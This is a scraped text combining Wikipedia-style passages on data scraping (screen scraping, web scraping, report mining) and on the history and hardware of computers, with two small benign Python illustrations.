As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. 
A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
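Report mining, as described above, amounts to parsing a spooled, human-readable report rather than querying the source system. The sketch below parses a small invented report layout with a regular expression; the column format and field names are purely illustrative.

import re
from io import StringIO

# Stand-in for a report spooled to a text file instead of a printer.
spooled_report = StringIO("""\
DAILY SALES REPORT                PAGE 1
ORDER    CUSTOMER            TOTAL
10041    Acme Corp          199.00
10042    Globex Ltd          52.50
""")

line_pattern = re.compile(r"^(\d{5})\s+(.+?)\s+(\d+\.\d{2})\s*$")

records = []
for line in spooled_report:
    match = line_pattern.match(line)
    if match:                                 # header lines simply do not match
        order_id, customer, total = match.groups()
        records.append({"order": order_id,
                        "customer": customer.strip(),
                        "total": float(total)})

print(records)   # two dicts, one per detail line of the report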
500 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Computer | A computer is a machine that can be programmed to automatically carry out sequences of arithmetic or logical operations (computation). Modern digital electronic computers can perform generic sets of operations known as programs. These programs enable computers to perform a wide range of tasks. The term computer system may refer to a nominally complete computer that includes the hardware, operating system, software, and peripheral equipment needed and used for full operation; or to a group of computers that are linked and function together, such as a computer network or computer cluster. A broad range of industrial and consumer products use computers as control systems, including simple special-purpose devices like microwave ovens and remote controls, and factory devices like industrial robots. Computers are at the core of general-purpose devices such as personal computers and mobile devices such as smartphones. Computers power the Internet, which links billions of computers and users. Early computers were meant to be used only for calculations. Simple manual instruments like the abacus have aided people in doing calculations since ancient times. Early in the Industrial Revolution, some mechanical devices were built to automate long, tedious tasks, such as guiding patterns for looms. More sophisticated electrical machines did specialized analog calculations in the early 20th century. The first digital electronic calculating machines were developed during World War II, both electromechanical and using thermionic valves. The first semiconductor transistors in the late 1940s were followed by the silicon-based MOSFET (MOS transistor) and monolithic integrated circuit chip technologies in the late 1950s, leading to the microprocessor and the microcomputer revolution in the 1970s. The speed, power, and versatility of computers have been increasing dramatically ever since then, with transistor counts increasing at a rapid pace (Moore's law noted that counts doubled every two years), leading to the Digital Revolution during the late 20th and early 21st centuries. Conventionally, a modern computer consists of at least one processing element, typically a central processing unit (CPU) in the form of a microprocessor, together with some type of computer memory, typically semiconductor memory chips. The processing element carries out arithmetic and logical operations, and a sequencing and control unit can change the order of operations in response to stored information. Peripheral devices include input devices (keyboards, mice, joystick, etc.), output devices (monitor screens, printers, etc.), and input output devices that perform both functions (e.g., the 2000s-era touchscreen). Peripheral devices allow information to be retrieved from an external source, and they enable the results of operations to be saved and retrieved. It was not until the mid 20th century that the word acquired its modern definition; according to the Oxford English Dictionary, the first known use of the word computer was in a different sense, in a 1613 book called The Yong Mans Gleanings by the English writer Richard Brathwait: "I haue sic read the truest computer of Times, and the best Arithmetician that euer sic breathed, and he reduceth thy dayes into a short number. This usage of the term referred to a human computer, a person who carried out calculations or computations. 
The word continued to have the same meaning until the middle of the 20th century. During the latter part of this period, women were often hired as computers because they could be paid less than their male counterparts. 1 By 1943, most human computers were women. 2 The Online Etymology Dictionary gives the first attested use of computer in the 1640s, meaning 'one who calculates'; this is an "agent noun from compute (v.) . The Online Etymology Dictionary states that the use of the term to mean 'calculating machine' (of any type) is from 1897. The Online Etymology Dictionary indicates that the "modern use" of the term, to mean 'programmable digital electronic computer' dates from "1945 under this name; in a theoretical sense from 1937, as Turing machine". 3 The name has remained, although modern computers are capable of many higher-level functions. Devices have been used to aid computation for thousands of years, mostly using one-to-one correspondence with fingers. The earliest counting device was most likely a form of tally stick. Later record keeping aids throughout the Fertile Crescent included calculi (clay spheres, cones, etc.) which represented counts of items, likely livestock or grains, sealed in hollow unbaked clay containers. a 4 The use of counting rods is one example. The abacus was initially used for arithmetic tasks. The Roman abacus was developed from devices used in Babylonia as early as 2400 BCE. Since then, many other forms of reckoning boards or tables have been invented. In a medieval European counting house, a checkered cloth would be placed on a table, and markers moved around on it according to certain rules, as an aid to calculating sums of money. 5 The Antikythera mechanism is believed to be the earliest known mechanical analog computer, according to Derek J. de Solla Price. 6 It was designed to calculate astronomical positions. It was discovered in 1901 in the Antikythera wreck off the Greek island of Antikythera, between Kythera and Crete, and has been dated to approximately c. 100 BCE. Devices of comparable complexity to the Antikythera mechanism would not reappear until the fourteenth century. 7 Many mechanical aids to calculation and measurement were constructed for astronomical and navigation use. The planisphere was a star chart invented by Ab Rayh n al-B r n in the early 11th century. 8 The astrolabe was invented in the Hellenistic world in either the 1st or 2nd centuries BCE and is often attributed to Hipparchus. A combination of the planisphere and dioptra, the astrolabe was effectively an analog computer capable of working out several different kinds of problems in spherical astronomy. An astrolabe incorporating a mechanical calendar computer 9 10 and gear-wheels was invented by Abi Bakr of Isfahan, Persia in 1235. 11 Ab Rayh n al-B r n invented the first mechanical geared lunisolar calendar astrolabe, 12 an early fixed-wired knowledge processing machine 13 with a gear train and gear-wheels, 14 c. 1000 AD. The sector, a calculating instrument used for solving problems in proportion, trigonometry, multiplication and division, and for various functions, such as squares and cube roots, was developed in the late 16th century and found application in gunnery, surveying and navigation. The planimeter was a manual instrument to calculate the area of a closed figure by tracing over it with a mechanical linkage. The slide rule was invented around 1620 1630, by the English clergyman William Oughtred, shortly after the publication of the concept of the logarithm. 
It is a hand-operated analog computer for doing multiplication and division. As slide rule development progressed, added scales provided reciprocals, squares and square roots, cubes and cube roots, as well as transcendental functions such as logarithms and exponentials, circular and hyperbolic trigonometry and other functions. Slide rules with special scales are still used for quick performance of routine calculations, such as the E6B circular slide rule used for time and distance calculations on light aircraft. In the 1770s, Pierre Jaquet-Droz, a Swiss watchmaker, built a mechanical doll (automaton) that could write holding a quill pen. By switching the number and order of its internal wheels different letters, and hence different messages, could be produced. In effect, it could be mechanically "programmed" to read instructions. Along with two other complex machines, the doll is at the Musée d'Art et d'Histoire of Neuchâtel, Switzerland, and still operates. 15 In 1831–1835, mathematician and engineer Giovanni Plana devised a Perpetual Calendar machine, which, through a system of pulleys and cylinders, could predict the perpetual calendar for every year from 0 CE (that is, 1 BCE) to 4000 CE, keeping track of leap years and varying day length. The tide-predicting machine invented by the Scottish scientist Sir William Thomson in 1872 was of great utility to navigation in shallow waters. It used a system of pulleys and wires to automatically calculate predicted tide levels for a set period at a particular location. The differential analyser, a mechanical analog computer designed to solve differential equations by integration, used wheel-and-disc mechanisms to perform the integration. In 1876, Sir William Thomson had already discussed the possible construction of such calculators, but he had been stymied by the limited output torque of the ball-and-disk integrators. 16 In a differential analyzer, the output of one integrator drove the input of the next integrator, or a graphing output. The torque amplifier was the advance that allowed these machines to work. Starting in the 1920s, Vannevar Bush and others developed mechanical differential analyzers. In the 1890s, the Spanish engineer Leonardo Torres Quevedo began to develop a series of advanced analog machines that could solve real and complex roots of polynomials, 17 18 19 20 which were published in 1901 by the Paris Academy of Sciences. 21 Charles Babbage, an English mechanical engineer and polymath, originated the concept of a programmable computer. Considered the "father of the computer", 22 he conceptualized and invented the first mechanical computer in the early 19th century. After working on his difference engine, which he designed to aid in navigational calculations, he announced his invention in 1822 in a paper to the Royal Astronomical Society titled "Note on the application of machinery to the computation of astronomical and mathematical tables". 23 In 1833 he realized that a much more general design, an analytical engine, was possible. The input of programs and data was to be provided to the machine via punched cards, a method being used at the time to direct mechanical looms such as the Jacquard loom. For output, the machine would have a printer, a curve plotter and a bell. The machine would also be able to punch numbers onto cards to be read in later.
The engine would incorporate an arithmetic logic unit, control flow in the form of conditional branching and loops, and integrated memory, making it the first design for a general-purpose computer that could be described in modern terms as Turing-complete. 24 25 The machine was about a century ahead of its time. All the parts for his machine had to be made by hand; this was a major problem for a device with thousands of parts. Eventually, the project was dissolved with the decision of the British Government to cease funding. Babbage's failure to complete the analytical engine can be chiefly attributed to political and financial difficulties as well as his desire to develop an increasingly sophisticated computer and to move ahead faster than anyone else could follow. Nevertheless, his son, Henry Babbage, completed a simplified version of the analytical engine's computing unit (the mill) in 1888. He gave a successful demonstration of its use in computing tables in 1906. In his work Essays on Automatics, published in 1914, Leonardo Torres Quevedo wrote a brief history of Babbage's efforts at constructing a mechanical Difference Engine and Analytical Engine. The paper contains a design of a machine capable of calculating formulas like a^x (y - z)^2 for a sequence of sets of values. The whole machine was to be controlled by a read-only program, which was complete with provisions for conditional branching. He also introduced the idea of floating-point arithmetic. 26 27 28 In 1920, to celebrate the 100th anniversary of the invention of the arithmometer, Torres presented in Paris the Electromechanical Arithmometer, which allowed a user to input arithmetic problems through a keyboard, and computed and printed the results, 29 30 31 32 demonstrating the feasibility of an electromechanical analytical engine. 33 During the first half of the 20th century, many scientific computing needs were met by increasingly sophisticated analog computers, which used a direct mechanical or electrical model of the problem as a basis for computation. However, these were not programmable and generally lacked the versatility and accuracy of modern digital computers. 34 The first modern analog computer was a tide-predicting machine, invented by Sir William Thomson (later to become Lord Kelvin) in 1872. The differential analyser, a mechanical analog computer designed to solve differential equations by integration using wheel-and-disc mechanisms, was conceptualized in 1876 by James Thomson, the elder brother of the more famous Sir William Thomson. 16 The art of mechanical analog computing reached its zenith with the differential analyzer, built by H. L. Hazen and Vannevar Bush at MIT starting in 1927. This built on the mechanical integrators of James Thomson and the torque amplifiers invented by H. W. Nieman. A dozen of these devices were built before their obsolescence became obvious. By the 1950s, the success of digital electronic computers had spelled the end for most analog computing machines, but analog computers remained in use during the 1950s in some specialized applications such as education (slide rule) and aircraft (control systems). By 1938, the United States Navy had developed an electromechanical analog computer small enough to use aboard a submarine. This was the Torpedo Data Computer, which used trigonometry to solve the problem of firing a torpedo at a moving target. During World War II similar devices were developed in other countries as well.
Early digital computers were electromechanical; electric switches drove mechanical relays to perform the calculation. These devices had a low operating speed and were eventually superseded by much faster all-electric computers, originally using vacuum tubes. The Z2, created by German engineer Konrad Zuse in 1939 in Berlin, was one of the earliest examples of an electromechanical relay computer. 35 In 1941, Zuse followed his earlier machine up with the Z3, the world's first working electromechanical programmable, fully automatic digital computer. 38 39 The Z3 was built with 2000 relays, implementing a 22 bit word length that operated at a clock frequency of about 5 10 Hz. 40 Program code was supplied on punched film while data could be stored in 64 words of memory or supplied from the keyboard. It was quite similar to modern machines in some respects, pioneering numerous advances such as floating-point numbers. Rather than the harder-to-implement decimal system (used in Charles Babbage's earlier design), using a binary system meant that Zuse's machines were easier to build and potentially more reliable, given the technologies available at that time. 41 The Z3 was not itself a universal computer but could be extended to be Turing complete. 42 43 Zuse's next computer, the Z4, became the world's first commercial computer; after initial delay due to the Second World War, it was completed in 1950 and delivered to the ETH Zurich. 44 The computer was manufactured by Zuse's own company, Zuse KG, which was founded in 1941 as the first company with the sole purpose of developing computers in Berlin. 44 Purely electronic circuit elements soon replaced their mechanical and electromechanical equivalents, at the same time that digital calculation replaced analog. The engineer Tommy Flowers, working at the Post Office Research Station in London in the 1930s, began to explore the possible use of electronics for the telephone exchange. Experimental equipment that he built in 1934 went into operation five years later, converting a portion of the telephone exchange network into an electronic data processing system, using thousands of vacuum tubes. 34 In the US, John Vincent Atanasoff and Clifford E. Berry of Iowa State University developed and tested the Atanasoff Berry Computer (ABC) in 1942, 45 the first "automatic electronic digital computer". 46 This design was also all-electronic and used about 300 vacuum tubes, with capacitors fixed in a mechanically rotating drum for memory. 47 During World War II, the British code-breakers at Bletchley Park achieved a number of successes at breaking encrypted German military communications. The German encryption machine, Enigma, was first attacked with the help of the electro-mechanical bombes which were often run by women. 48 49 To crack the more sophisticated German Lorenz SZ 40 42 machine, used for high-level Army communications, Max Newman and his colleagues commissioned Flowers to build the Colossus. 47 He spent eleven months from early February 1943 designing and building the first Colossus. 50 After a functional test in December 1943, Colossus was shipped to Bletchley Park, where it was delivered on 18 January 1944 51 and attacked its first message on 5 February. 47 Colossus was the world's first electronic digital programmable computer. 34 It used a large number of valves (vacuum tubes). It had paper-tape input and was capable of being configured to perform a variety of boolean logical operations on its data, but it was not Turing-complete. 
Nine Mk II Colossi were built (The Mk I was converted to a Mk II making ten machines in total). Colossus Mark I contained 1,500 thermionic valves (tubes), but Mark II with 2,400 valves, was both five times faster and simpler to operate than Mark I, greatly speeding the decoding process. 52 53 The ENIAC 54 (Electronic Numerical Integrator and Computer) was the first electronic programmable computer built in the U.S. Although the ENIAC was similar to the Colossus, it was much faster, more flexible, and it was Turing-complete. Like the Colossus, a "program" on the ENIAC was defined by the states of its patch cables and switches, a far cry from the stored program electronic machines that came later. Once a program was written, it had to be mechanically set into the machine with manual resetting of plugs and switches. The programmers of the ENIAC were six women, often known collectively as the "ENIAC girls". 55 56 It combined the high speed of electronics with the ability to be programmed for many complex problems. It could add or subtract 5000 times a second, a thousand times faster than any other machine. It also had modules to multiply, divide, and square root. High speed memory was limited to 20 words (about 80 bytes). Built under the direction of John Mauchly and J. Presper Eckert at the University of Pennsylvania, ENIAC's development and construction lasted from 1943 to full operation at the end of 1945. The machine was huge, weighing 30 tons, using 200 kilowatts of electric power and contained over 18,000 vacuum tubes, 1,500 relays, and hundreds of thousands of resistors, capacitors, and inductors. 57 The principle of the modern computer was proposed by Alan Turing in his seminal 1936 paper, 58 On Computable Numbers. Turing proposed a simple device that he called "Universal Computing machine" and that is now known as a universal Turing machine. He proved that such a machine is capable of computing anything that is computable by executing instructions (program) stored on tape, allowing the machine to be programmable. The fundamental concept of Turing's design is the stored program, where all the instructions for computing are stored in memory. Von Neumann acknowledged that the central concept of the modern computer was due to this paper. 59 Turing machines are to this day a central object of study in theory of computation. Except for the limitations imposed by their finite memory stores, modern computers are said to be Turing-complete, which is to say, they have algorithm execution capability equivalent to a universal Turing machine. Early computing machines had fixed programs. Changing its function required the re-wiring and re-structuring of the machine. 47 With the proposal of the stored-program computer this changed. A stored-program computer includes by design an instruction set and can store in memory a set of instructions (a program) that details the computation. The theoretical basis for the stored-program computer was laid out by Alan Turing in his 1936 paper. In 1945, Turing joined the National Physical Laboratory and began work on developing an electronic stored-program digital computer. His 1945 report "Proposed Electronic Calculator" was the first specification for such a device. John von Neumann at the University of Pennsylvania also circulated his First Draft of a Report on the EDVAC in 1945. 34 The Manchester Baby was the world's first stored-program computer. It was built at the University of Manchester in England by Frederic C. 
Williams, Tom Kilburn and Geoff Tootill, and ran its first program on 21 June 1948. 60 It was designed as a testbed for the Williams tube, the first random-access digital storage device. 61 Although the computer was described as "small and primitive" by a 1998 retrospective, it was the first working machine to contain all of the elements essential to a modern electronic computer. 62 As soon as the Baby had demonstrated the feasibility of its design, a project began at the university to develop it into a practically useful computer, the Manchester Mark 1. The Mark 1 in turn quickly became the prototype for the Ferranti Mark 1, the world's first commercially available general-purpose computer. 63 Built by Ferranti, it was delivered to the University of Manchester in February 1951. At least seven of these later machines were delivered between 1953 and 1957, one of them to Shell labs in Amsterdam. 64 In October 1947 the directors of British catering company J. Lyons Company decided to take an active role in promoting the commercial development of computers. Lyons's LEO I computer, modelled closely on the Cambridge EDSAC of 1949, became operational in April 1951 65 and ran the world's first routine office computer job. The concept of a field-effect transistor was proposed by Julius Edgar Lilienfeld in 1925. John Bardeen and Walter Brattain, while working under William Shockley at Bell Labs, built the first working transistor, the point-contact transistor, in 1947, which was followed by Shockley's bipolar junction transistor in 1948. 66 67 From 1955 onwards, transistors replaced vacuum tubes in computer designs, giving rise to the "second generation" of computers. Compared to vacuum tubes, transistors have many advantages: they are smaller, and require less power than vacuum tubes, so give off less heat. Junction transistors were much more reliable than vacuum tubes and had longer, indefinite, service life. Transistorized computers could contain tens of thousands of binary logic circuits in a relatively compact space. However, early junction transistors were relatively bulky devices that were difficult to manufacture on a mass-production basis, which limited them to a number of specialized applications. 68 At the University of Manchester, a team under the leadership of Tom Kilburn designed and built a machine using the newly developed transistors instead of valves. 69 Their first transistorized computer and the first in the world, was operational by 1953, and a second version was completed there in April 1955. However, the machine did make use of valves to generate its 125 kHz clock waveforms and in the circuitry to read and write on its magnetic drum memory, so it was not the first completely transistorized computer. That distinction goes to the Harwell CADET of 1955, 70 built by the electronics division of the Atomic Energy Research Establishment at Harwell. 70 71 The metal oxide silicon field-effect transistor (MOSFET), also known as the MOS transistor, was invented by Mohamed M. Atalla and Dawon Kahng at Bell Labs in 1959. 72 It was the first truly compact transistor that could be miniaturized and mass-produced for a wide range of uses. 68 With its high scalability, 73 and much lower power consumption and higher density than bipolar junction transistors, 74 the MOSFET made it possible to build high-density integrated circuits. 
75 76 In addition to data processing, it also enabled the practical use of MOS transistors as memory cell storage elements, leading to the development of MOS semiconductor memory, which replaced earlier magnetic-core memory in computers. The MOSFET led to the microcomputer revolution, 77 and became the driving force behind the computer revolution. 78 79 The MOSFET is the most widely used transistor in computers, 80 81 and is the fundamental building block of digital electronics. 82 The next great advance in computing power came with the advent of the integrated circuit (IC). The idea of the integrated circuit was first conceived by a radar scientist working for the Royal Radar Establishment of the Ministry of Defence, Geoffrey W.A. Dummer. Dummer presented the first public description of an integrated circuit at the Symposium on Progress in Quality Electronic Components in Washington, D.C., on 7 May 1952. 83 The first working ICs were invented by Jack Kilby at Texas Instruments and Robert Noyce at Fairchild Semiconductor. 84 Kilby recorded his initial ideas concerning the integrated circuit in July 1958, successfully demonstrating the first working integrated example on 12 September 1958. 85 In his patent application of 6 February 1959, Kilby described his new device as "a body of semiconductor material ... wherein all the components of the electronic circuit are completely integrated". 86 87 However, Kilby's invention was a hybrid integrated circuit (hybrid IC), rather than a monolithic integrated circuit (IC) chip. 88 Kilby's IC had external wire connections, which made it difficult to mass-produce. 89 Noyce also came up with his own idea of an integrated circuit half a year later than Kilby. 90 Noyce's invention was the first true monolithic IC chip. 91 89 His chip solved many practical problems that Kilby's had not. Produced at Fairchild Semiconductor, it was made of silicon, whereas Kilby's chip was made of germanium. Noyce's monolithic IC was fabricated using the planar process, developed by his colleague Jean Hoerni in early 1959. In turn, the planar process was based on Mohamed M. Atalla's work on semiconductor surface passivation by silicon dioxide in the late 1950s. 92 93 94 Modern monolithic ICs are predominantly MOS (metal oxide semiconductor) integrated circuits, built from MOSFETs (MOS transistors). 95 The earliest experimental MOS IC to be fabricated was a 16 transistor chip built by Fred Heiman and Steven Hofstein at RCA in 1962. 96 General Microelectronics later introduced the first commercial MOS IC in 1964, 97 developed by Robert Norman. 96 Following the development of the self-aligned gate (silicon-gate) MOS transistor by Robert Kerwin, Donald Klein and John Sarace at Bell Labs in 1967, the first silicon-gate MOS IC with self-aligned gates was developed by Federico Faggin at Fairchild Semiconductor in 1968. 98 The MOSFET has since become the most critical device component in modern ICs. 95 The development of the MOS integrated circuit led to the invention of the microprocessor, 99 100 and heralded an explosion in the commercial and personal use of computers. While the subject of exactly which device was the first microprocessor is contentious, partly due to lack of agreement on the exact definition of the term "microprocessor", it is largely undisputed that the first single-chip microprocessor was the Intel 4004, 101 designed and realized by Federico Faggin with his silicon-gate MOS IC technology, 99 along with Ted Hoff, Masatoshi Shima and Stanley Mazor at Intel. 
b 103 In the early 1970s, MOS IC technology enabled the integration of more than 10,000 transistors on a single chip. 76 System on a Chip (SoCs) are complete computers on a microchip (or chip) the size of a coin. 104 They may or may not have integrated RAM and flash memory. If not integrated, the RAM is usually placed directly above (known as Package on package) or below (on the opposite side of the circuit board) the SoC, and the flash memory is usually placed right next to the SoC, this all done to improve data transfer speeds, as the data signals do not have to travel long distances. Since ENIAC in 1945, computers have advanced enormously, with modern SoCs (Such as the Snapdragon 865) being the size of a coin while also being hundreds of thousands of times more powerful than ENIAC, integrating billions of transistors, and consuming only a few watts of power. The first mobile computers were heavy and ran from mains power. The 50 lb (23 kg) IBM 5100 was an early example. Later portables such as the Osborne 1 and Compaq Portable were considerably lighter but still needed to be plugged in. The first laptops, such as the Grid Compass, removed this requirement by incorporating batteries and with the continued miniaturization of computing resources and advancements in portable battery life, portable computers grew in popularity in the 2000s. 105 The same developments allowed manufacturers to integrate computing resources into cellular mobile phones by the early 2000s. These smartphones and tablets run on a variety of operating systems and recently became the dominant computing device on the market. 106 These are powered by System on a Chip (SoCs), which are complete computers on a microchip the size of a coin. 104 Computers can be classified in a number of different ways, including: The term hardware covers all of those parts of a computer that are tangible physical objects. Circuits, computer chips, graphic cards, sound cards, memory (RAM), motherboard, displays, power supplies, cables, keyboards, printers and "mice" input devices are all hardware. A general-purpose computer has four main components: the arithmetic logic unit (ALU), the control unit, the memory, and the input and output devices (collectively termed I O). These parts are interconnected by buses, often made of groups of wires. Inside each of these parts are thousands to trillions of small electrical circuits which can be turned off or on by means of an electronic switch. Each circuit represents a bit (binary digit) of information so that when the circuit is on it represents a "1", and when off it represents a "0" (in positive logic representation). The circuits are arranged in logic gates so that one or more of the circuits may control the state of one or more of the other circuits. When unprocessed data is sent to the computer with the help of input devices, the data is processed and sent to output devices. The input devices may be hand-operated or automated. The act of processing is mainly regulated by the CPU. Some examples of input devices are: The means through which computer gives output are known as output devices. Some examples of output devices are: The control unit (often called a control system or central controller) manages the computer's various components; it reads and interprets (decodes) the program instructions, transforming them into control signals that activate other parts of the computer. d Control systems in advanced computers may change the order of execution of some instructions to improve performance. 
A key component common to all CPUs is the program counter, a special memory cell (a register) that keeps track of which location in memory the next instruction is to be read from. e The control system's function is as follows— this is a simplified description, and some of these steps may be performed concurrently or in a different order depending on the type of CPU: Since the program counter is (conceptually) just another set of memory cells, it can be changed by calculations done in the ALU. Adding 100 to the program counter would cause the next instruction to be read from a place 100 locations further down the program. Instructions that modify the program counter are often known as "jumps" and allow for loops (instructions that are repeated by the computer) and often conditional instruction execution (both examples of control flow). The sequence of operations that the control unit goes through to process an instruction is in itself like a short computer program, and indeed, in some more complex CPU designs, there is another yet smaller computer called a microsequencer, which runs a microcode program that causes all of these events to happen. The control unit, ALU, and registers are collectively known as a central processing unit (CPU). Early CPUs were composed of many separate components. Since the 1970s, CPUs have typically been constructed on a single MOS integrated circuit chip called a microprocessor. The ALU is capable of performing two classes of operations: arithmetic and logic. 111 The set of arithmetic operations that a particular ALU supports may be limited to addition and subtraction, or might include multiplication, division, trigonometry functions such as sine, cosine, etc., and square roots. Some can operate only on whole numbers (integers) while others use floating point to represent real numbers, albeit with limited precision. However, any computer that is capable of performing just the simplest operations can be programmed to break down the more complex operations into simple steps that it can perform. Therefore, any computer can be programmed to perform any arithmetic operation—although it will take more time to do so if its ALU does not directly support the operation. An ALU may also compare numbers and return Boolean truth values (true or false) depending on whether one is equal to, greater than or less than the other ("is 64 greater than 65? ). Logic operations involve Boolean logic: AND, OR, XOR, and NOT. These can be useful for creating complicated conditional statements and processing Boolean logic. Superscalar computers may contain multiple ALUs, allowing them to process several instructions simultaneously. 112 Graphics processors and computers with SIMD and MIMD features often contain ALUs that can perform arithmetic on vectors and matrices. A computer's memory can be viewed as a list of cells into which numbers can be placed or read. Each cell has a numbered "address" and can store a single number. The computer can be instructed to "put the number 123 into the cell numbered 1357" or to "add the number that is in cell 1357 to the number that is in cell 2468 and put the answer into cell 1595. The information stored in memory may represent practically anything. Letters, numbers, even computer instructions can be placed into memory with equal ease. Since the CPU does not differentiate between different types of information, it is the software's responsibility to give significance to what the memory sees as nothing but a series of numbers. 
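The memory-cell, ALU and program-counter description above translates almost directly into Python. The short sketch below is purely illustrative: the 4096-cell memory and the stored values are arbitrary, the cell addresses 1357, 2468 and 1595 are simply the ones used in the passage, and a real CPU does all of this in hardware rather than in a list.
# Illustrative sketch (not real hardware): memory as a list of numbered cells,
# the ALU as ordinary arithmetic, and the program counter as one more number.
memory = [0] * 4096                 # numbered cells, each holding one number

memory[1357] = 123                  # "put the number 123 into the cell numbered 1357"
memory[2468] = 877
memory[1595] = memory[1357] + memory[2468]   # add cell 1357 to cell 2468, store in 1595
print(memory[1595])                 # 1000

program_counter = 0                 # conceptually just another memory cell
program_counter += 100              # a "jump": the next instruction would now be
print(program_counter)              # fetched from a location 100 further on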
In almost all modern computers, each memory cell is set up to store binary numbers in groups of eight bits (called a byte). Each byte is able to represent 256 different numbers (2^8 = 256), either from 0 to 255 or from -128 to 127. To store larger numbers, several consecutive bytes may be used (typically, two, four or eight). When negative numbers are required, they are usually stored in two's complement notation. Other arrangements are possible, but are usually not seen outside of specialized applications or historical contexts. A computer can store any kind of information in memory if it can be represented numerically. Modern computers have billions or even trillions of bytes of memory. The CPU contains a special set of memory cells called registers that can be read and written to much more rapidly than the main memory area. There are typically between two and one hundred registers depending on the type of CPU. Registers are used for the most frequently needed data items to avoid having to access main memory every time data is needed. As data is constantly being worked on, reducing the need to access main memory (which is often slow compared to the ALU and control units) greatly increases the computer's speed. Computer main memory comes in two principal varieties: RAM can be read and written to anytime the CPU commands it, but ROM is preloaded with data and software that never changes, therefore the CPU can only read from it. ROM is typically used to store the computer's initial start-up instructions. In general, the contents of RAM are erased when the power to the computer is turned off, but ROM retains its data indefinitely. In a PC, the ROM contains a specialized program called the BIOS that orchestrates loading the computer's operating system from the hard disk drive into RAM whenever the computer is turned on or reset. In embedded computers, which frequently do not have disk drives, all of the required software may be stored in ROM. Software stored in ROM is often called firmware, because it is notionally more like hardware than software. Flash memory blurs the distinction between ROM and RAM, as it retains its data when turned off but is also rewritable. It is typically much slower than conventional ROM and RAM, however, so its use is restricted to applications where high speed is unnecessary. f In more sophisticated computers there may be one or more RAM cache memories, which are slower than registers but faster than main memory. Generally computers with this sort of cache are designed to move frequently needed data into the cache automatically, often without the need for any intervention on the programmer's part. I/O is the means by which a computer exchanges information with the outside world. 114 Devices that provide input or output to the computer are called peripherals. 115 On a typical personal computer, peripherals include input devices like the keyboard and mouse, and output devices such as the display and printer. Hard disk drives, floppy disk drives and optical disc drives serve as both input and output devices. Computer networking is another form of I/O. I/O devices are often complex computers in their own right, with their own CPU and memory. A graphics processing unit might contain fifty or more tiny computers that perform the calculations necessary to display 3D graphics. Modern desktop computers contain many smaller computers that assist the main CPU in performing I/O. A 2016-era flat-screen display contains its own computer circuitry.
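The 8-bit figures quoted above (256 values per byte, 0 to 255 unsigned, -128 to 127 signed) are easy to verify in Python; the helper below is only a quick illustration of how two's complement folds negative numbers into the same eight bits.
# Verify the byte ranges mentioned above.
print(2 ** 8)                                   # 256 distinct values per byte

def to_twos_complement(n, bits=8):
    # Two's complement representation: n is stored as n modulo 2**bits.
    return n & ((1 << bits) - 1)

print(to_twos_complement(-128))                 # 128 -> bit pattern 10000000
print(to_twos_complement(-1))                   # 255 -> bit pattern 11111111
# Decoding the stored byte as a signed value recovers the original number.
print(int.from_bytes(bytes([255]), "big", signed=True))   # -1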
